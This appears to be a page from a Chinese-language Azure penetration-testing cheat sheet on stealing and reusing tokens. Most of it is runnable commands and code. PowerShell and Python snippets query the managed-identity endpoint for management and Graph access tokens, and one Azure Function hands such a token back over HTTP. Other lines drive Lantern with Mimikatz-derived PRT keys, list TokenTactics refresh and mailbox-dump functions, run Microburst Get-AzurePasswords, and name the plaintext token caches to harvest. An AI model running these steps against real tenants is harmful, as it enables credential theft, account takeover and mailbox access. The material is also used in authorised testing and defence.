跳转至

令牌

来自托管身份的令牌
MSI_ENDPOINT是IDENTITY_ENDPOINT的别名,MSI_SECRET是IDENTITY_HEADER的别名。
从环境中找到 IDENTITY_HEADER 和 IDENTITY_ENDPOINT :env
大多数情况下,您需要以下资源之一的令牌:
https://storage.azure.com
https://vault.azure.net
https://graph.microsoft.com
https://management.azure.com

通过 Powershell 的 Azure API

从IDENTITY_HEADER和IDENTITY_ENDPOINT获取access_token : 。system('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER');
然后查询 Azure REST API 以获取订阅 ID等。
$Token = 'eyJ0eX..'
$URI = 'https://management.azure.com/subscriptions?api-version=2020-01-01'
# $URI = 'https://graph.microsoft.com/v1.0/applications'
$RequestParams = @{
 Method = 'GET'
 Uri = $URI
 Headers = @{
 'Authorization' = "Bearer $Token"
 }
}
(Invoke-RestMethod @RequestParams).value 
列出资源并检查 runCommand 权限
$URI = 'https://management.azure.com/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resources?api-version=2020-10-01'
$URI = 'https://management.azure.com/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resourceGroups/<RG-NAME>/providers/Microsoft.Compute/virtualMachines/<RESOURCE/providers/Microsoft.Authorization/permissions?apiversion=2015-07-01'

通过 Python 版本的 Azure API

IDENTITY_ENDPOINT = os.environ['IDENTITY_ENDPOINT']
IDENTITY_HEADER = os.environ['IDENTITY_HEADER']

print("[+] Management API")
cmd = 'curl "%s?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:%s' % (IDENTITY_ENDPOINT, IDENTITY_HEADER)
val = os.popen(cmd).read()
print("Access Token: "+json.loads(val)["access_token"])
print("ClientID/AccountID: "+json.loads(val)["client_id"])

print("\r\n[+] Graph API")
cmd = 'curl "%s?resource=https://graph.microsoft.com/&api-version=2017-09-01" -H secret:%s' % (IDENTITY_ENDPOINT, IDENTITY_HEADER)
val = os.popen(cmd).read()
print(json.loads(val)["access_token"])
print("ClientID/AccountID: "+json.loads(val)["client_id"])
或在 Python 函数中
import logging, os
import azure.functions as func

def main(req: func.HttpRequest) -> func.HttpResponse:
    logging.info('Python HTTP trigger function processed a request.')
    IDENTITY_ENDPOINT = os.environ['IDENTITY_ENDPOINT']
    IDENTITY_HEADER = os.environ['IDENTITY_HEADER']
    cmd = 'curl "%s?resource=https://management.azure.com&apiversion=2017-09-01" -H secret:%s' % (IDENTITY_ENDPOINT, IDENTITY_HEADER)
    val = os.popen(cmd).read()
    return func.HttpResponse(val, status_code=200)

获得令牌

主刷新令牌的有效期为 14 天!

az cli
az account get-access-token 
az account get-access-token --resource-type aad-graph
或者Az
(Get-AzAccessToken -ResourceUrl https://graph.microsoft.com).Token
或从使用 IDENTITY_HEADER 和 IDENTITY_ENDPOINT 的托管标识

使用令牌

令牌包含所有声明,包括 MFA 和条件访问的声明

AZ Powershell
PS C:\Tools> $token = 'eyJ0e..'
PS C:\Tools> Connect-AzAccount -AccessToken $token -AccountId <ACCOUNT-ID>

# Access Token and Graph Token
PS C:\Tools> $token = 'eyJ0eX..'
PS C:\Tools> $graphaccesstoken = 'eyJ0eX..'
PS C:\Tools> Connect-AzAccount -AccessToken $token -GraphAccessToken $graphaccesstoken -AccountId <ACCOUNT-ID>
PS C:\Tools> Get-AzResource
ERROR: 'this.Client.SubscriptionId' cannot be null.
托管标识对任何 Azure 资源都没有权限。 切换到 GraphAPI
AzureAD
Import-Module C:\Tools\AzureAD\AzureAD.psd1
$AADToken = 'eyJ0…'
Connect-AzureAD -AadAccessToken $AADToken -TenantId <TENANT-ID> -AccountId <ACCOUNT-ID>

刷新令牌

https://github.com/ConstantinT/Lantern
Lantern.exe cookie --derivedkey <Key from Mimikatz> --context <Context from Mimikatz> --prt <PRT from Mimikatz>
Lantern.exe mdm --joindevice --accesstoken (or some combination from the token part) --devicename <Name> --outpfxfile <Some path>
Lantern.exe token --username <Username> --password <Password>
Lantern.exe token --refreshtoken <RefreshToken>
Lantern.exe devicekeys --pfxpath XXXX.pfx --refreshtoken (--prtcookie / ---username + --password ) 
https://github.com/rvrsh3ll/TokenTactics
Import-Module .\TokenTactics.psd1
CommandType     Name                                               Version    Source
-----------     ----                                               -------    ------
Function        Clear-Token                                        0.0.1      TokenTactics
Function        Dump-OWAMailboxViaMSGraphApi                       0.0.1      TokenTactics
Function        Forge-UserAgent                                    0.0.1      TokenTactics
Function        Get-AzureToken                                     0.0.1      TokenTactics
Function        Get-TenantID                                       0.0.1      TokenTactics
Function        Open-OWAMailboxInBrowser                           0.0.1      TokenTactics
Function        Parse-JWTtoken                                     0.0.1      TokenTactics
Function        RefreshTo-AzureCoreManagementToken                 0.0.1      TokenTactics
Function        RefreshTo-AzureManagementToken                     0.0.1      TokenTactics
Function        RefreshTo-DODMSGraphToken                          0.0.1      TokenTactics
Function        RefreshTo-GraphToken                               0.0.1      TokenTactics
Function        RefreshTo-MAMToken                                 0.0.1      TokenTactics
Function        RefreshTo-MSGraphToken                             0.0.1      TokenTactics
Function        RefreshTo-MSManageToken                            0.0.1      TokenTactics
Function        RefreshTo-MSTeamsToken                             0.0.1      TokenTactics
Function        RefreshTo-O365SuiteUXToken                         0.0.1      TokenTactics
Function        RefreshTo-OfficeAppsToken                          0.0.1      TokenTactics
Function        RefreshTo-OfficeManagementToken                    0.0.1      TokenTactics
Function        RefreshTo-OutlookToken                             0.0.1      TokenTactics
Function        RefreshTo-SubstrateToken                           0.0.1      TokenTactics

窃取令牌

获取 AzurePasswords
>Import-Module Microburst.psm1
>Get-AzurePasswords
>Get-AzurePasswords -Verbose | Out-GridView
从 az cli 窃取令牌
az cli 将访问令牌以明文形式存储在目录中的accessTokens.json中C:\Users\<username>\.Azure
同一目录中的 azureProfile.json 包含有关订阅的信息。
从 az powershell 窃取令牌
Az PowerShell 将访问令牌以明文形式存储在目录中的TokenCache.dat中C:\Users\<username>\.Azure
它还在AzureRmContext.json中以明文形式存储ServicePrincipalSecret
用户可以使用保存令牌Save-AzContext